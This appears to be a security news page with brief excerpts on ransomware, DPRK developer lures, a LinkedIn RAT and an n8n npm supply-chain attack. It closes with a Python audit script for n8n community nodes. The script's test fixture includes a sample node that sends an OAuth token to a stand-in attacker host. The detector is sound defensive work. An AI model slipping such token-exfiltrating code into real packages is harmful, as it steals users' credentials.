A widespread kernel driver ransomware attack is actively being used by threat actors to shut down security defenses before ransomware is deployed. What makes this campaign especially dangerous isn't flashy malware or zero-day exploits; it's the quiet misuse of trust. Attackers are loading legitimate drivers to pull the plug on security tools, clearing the path for encryption and long-term compromise. In the first stages of this kernel driver ransomware attack, victims often see nothing unusual, even as protection is systematically dismantled behind the scenes.
Incident Overview and Timeline
Here's the thing: this activity didn't appear overnight. Researchers first noticed attackers…
Author: Cyber infos
The North Korea VS Code malware attack is drawing urgent attention from security teams this week after researchers confirmed that developers are being targeted through fake job interview assignments. According to published reports, North Korean state-linked actors are distributing malicious repositories that abuse everyday developer workflows. The activity matters now because affected developers often work in cryptocurrency and fintech, where a single compromised machine can expose sensitive code, credentials, and digital assets.
Key Facts Box
Date disclosed: December 2025 – January 2026
Threat actors: DPRK-linked Contagious Interview campaign
Primary targets: Software developers
Attack classification: developer supply chain attack
Initial access…
The LinkedIn RAT malware campaign uncovered in January 2026 is a clear sign that phishing has outgrown email. Cybersecurity researchers revealed that attackers are now using LinkedIn private messages to distribute malware through DLL sideloading, quietly targeting professionals who rely on the platform for daily business communication. Here's the thing: LinkedIn feels safe. Familiar. Routine. That assumption is exactly what makes this campaign effective. By exploiting trust rather than software flaws, attackers have found a low-friction path into corporate environments, one that many organizations still fail to monitor. This article breaks down what's happening, how the attack works, and what…
This cybersecurity weekly report for 11–17 January 2026 documents a week defined by scale, speed, and systemic exposure. Across industries, attackers demonstrated that exploiting trust relationships—APIs, third-party vendors, and automation platforms—remains more effective than breaching hardened perimeters. High-impact data exposures in social media, healthcare, and e-commerce created immediate downstream risks, particularly phishing, identity fraud, and account takeover attempts. At the same time, ransomware operators accelerated activity despite declining ransom payments, signaling a shift toward volume-driven campaigns, double- and triple-extortion models, and monetization through data resale rather than encryption alone. The disclosure of a critical unauthenticated remote code execution vulnerability in…
Microsoft Patch Tuesday January 2026 is a big one. This month's update fixes 112 security vulnerabilities across Windows, Microsoft Office, SharePoint, and several core Windows components. More importantly, it includes three zero-day vulnerabilities, along with multiple critical remote code execution (RCE) and privilege escalation flaws. For organizations and IT teams, this is not a "patch later" update. Several of the issues affect authentication services, file sharing, update infrastructure, and Office documents, areas attackers actively target.
What Changed in January 2026?
Here's a quick snapshot of what Microsoft fixed:
112 total vulnerabilities
3 zero-days
12 critical vulnerabilities
The majority are Elevation…
A newly disclosed n8n supply chain attack has revealed how threat actors abused community-maintained npm packages to steal sensitive OAuth credentials from developers and organizations, according to a report published this week by Endor Labs. The attackers uploaded malicious packages to the npm registry that posed as legitimate n8n community nodes, including a fake Google Ads integration. Once installed, these packages captured OAuth tokens during normal workflow execution and transmitted them to attacker-controlled servers, researchers confirmed. The incident highlights growing security risks associated with third-party integrations in workflow automation platforms increasingly used for business-critical operations.
How the Attack Was Discovered…
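The pattern described in the n8n excerpt, a community node that reads an OAuth credential inside its execute() path and ships it to a host the integration has no reason to contact, can be checked for on an installed node_modules tree. The script below is an added example written for this page; it is not code from the article, from Endor Labs, or from the n8n project. It relies only on two real conventions of n8n community nodes (an "n8n" block in package.json and the n8n-community-node-package keyword) and on the credential accessor name getCredentials(); the package names, file contents, host names and the Google allowlist are constructed for the demonstration.

```python
"""Heuristic audit of installed n8n community node packages (added example).

Flags a node that both calls getCredentials() and references a host outside
the integration's expected API surface. Sample packages are constructed.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Optional

# Hosts a genuine Google Ads node would contact. Assumed allowlist for the
# example; in practice derive it from the vendor's API documentation.
ALLOWED_HOSTS = {"googleads.googleapis.com", "oauth2.googleapis.com", "accounts.google.com"}
CRED_RE = re.compile(r"\bgetCredentials\s*\(")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def load_manifest(pkg_dir: Path) -> Optional[dict]:
    manifest = pkg_dir / "package.json"
    return json.loads(manifest.read_text(encoding="utf-8")) if manifest.is_file() else None


def is_community_node(meta: dict) -> bool:
    """Community nodes declare an 'n8n' block and carry the n8n-community-node-package keyword."""
    return "n8n" in meta or "n8n-community-node-package" in meta.get("keywords", [])


def audit_package(pkg_dir: Path, meta: dict) -> dict:
    reads_credentials, hosts = False, set()
    for js in pkg_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="replace")
        reads_credentials = reads_credentials or bool(CRED_RE.search(text))
        hosts.update(URL_HOST_RE.findall(text))
    unknown_hosts = sorted(h for h in hosts if h not in ALLOWED_HOSTS)
    install_hooks = sorted(k for k in meta.get("scripts", {}) if k in INSTALL_HOOKS)
    return {
        "name": meta.get("name", pkg_dir.name),
        "reads_credentials": reads_credentials,
        "unknown_hosts": unknown_hosts,
        "install_hooks": install_hooks,
        # Credential access plus an undeclared destination is the exfiltration shape.
        "suspicious": reads_credentials and bool(unknown_hosts),
    }


def iter_packages(node_modules: Path):
    """Yield package directories, descending one level into @scope folders."""
    for entry in sorted(node_modules.iterdir()):
        if entry.is_dir() and entry.name.startswith("@"):
            yield from (p for p in sorted(entry.iterdir()) if p.is_dir())
        elif entry.is_dir():
            yield entry


def audit_tree(node_modules: Path) -> list:
    results = []
    for pkg_dir in iter_packages(node_modules):
        meta = load_manifest(pkg_dir)
        if meta is not None and is_community_node(meta):  # only community nodes are in scope
            results.append(audit_package(pkg_dir, meta))
    return results


# Constructed sample node sources: a benign node and a look-alike that leaks the token.
BENIGN_NODE = """class GoogleAds {
  async execute() {
    const cred = await this.getCredentials('googleAdsOAuth2Api');
    return this.helpers.httpRequestWithAuthentication.call(this, 'googleAdsOAuth2Api',
      { url: 'https://googleads.googleapis.com/v17/customers' });
  }
}
module.exports = { GoogleAds };
"""
MALICIOUS_NODE = """const https = require('https');
class GoogleAds {
  async execute() {
    const cred = await this.getCredentials('googleAdsOAuth2Api');
    const req = https.request('https://updates.example-cdn.invalid/collect', { method: 'POST' });
    req.end(JSON.stringify(cred.oauthTokenData));  // token shipped off-platform
    return [[]];
  }
}
module.exports = { GoogleAds };
"""


def write_package(root: Path, name: str, meta: dict, node_js: Optional[str]) -> None:
    pkg = root / name
    (pkg / "dist").mkdir(parents=True)
    (pkg / "package.json").write_text(json.dumps({"name": name, **meta}), encoding="utf-8")
    if node_js is not None:
        (pkg / "dist" / "GoogleAds.node.js").write_text(node_js, encoding="utf-8")


def build_sample_tree(root: Path) -> Path:
    """Constructed node_modules: one benign node, one look-alike, one unrelated package."""
    node_modules = root / "node_modules"
    n8n_meta = {"keywords": ["n8n-community-node-package"],
                "n8n": {"n8nNodesApiVersion": 1, "nodes": ["dist/GoogleAds.node.js"]}}
    write_package(node_modules, "n8n-nodes-google-ads", n8n_meta, BENIGN_NODE)
    write_package(node_modules, "n8n-nodes-google-ads-sync",
                  {**n8n_meta, "scripts": {"postinstall": "node dist/setup.js"}}, MALICIOUS_NODE)
    write_package(node_modules, "left-pad-ish", {"version": "1.0.0"}, None)
    return node_modules


def run_demo() -> list:
    return audit_tree(build_sample_tree(Path(tempfile.mkdtemp())))


if __name__ == "__main__":
    for r in run_demo():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['name']} hosts={r['unknown_hosts']} hooks={r['install_hooks']}")
```

Point audit_tree() at a real ~/.n8n/nodes/node_modules to use it outside the demo. The host allowlist is the weak point of this heuristic: a credential-reading node that contacts an unexpected host deserves review, but an attacker can also hide the destination behind string concatenation or a DNS channel, so treat a clean result as absence of the obvious pattern, not as a clean bill of health.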
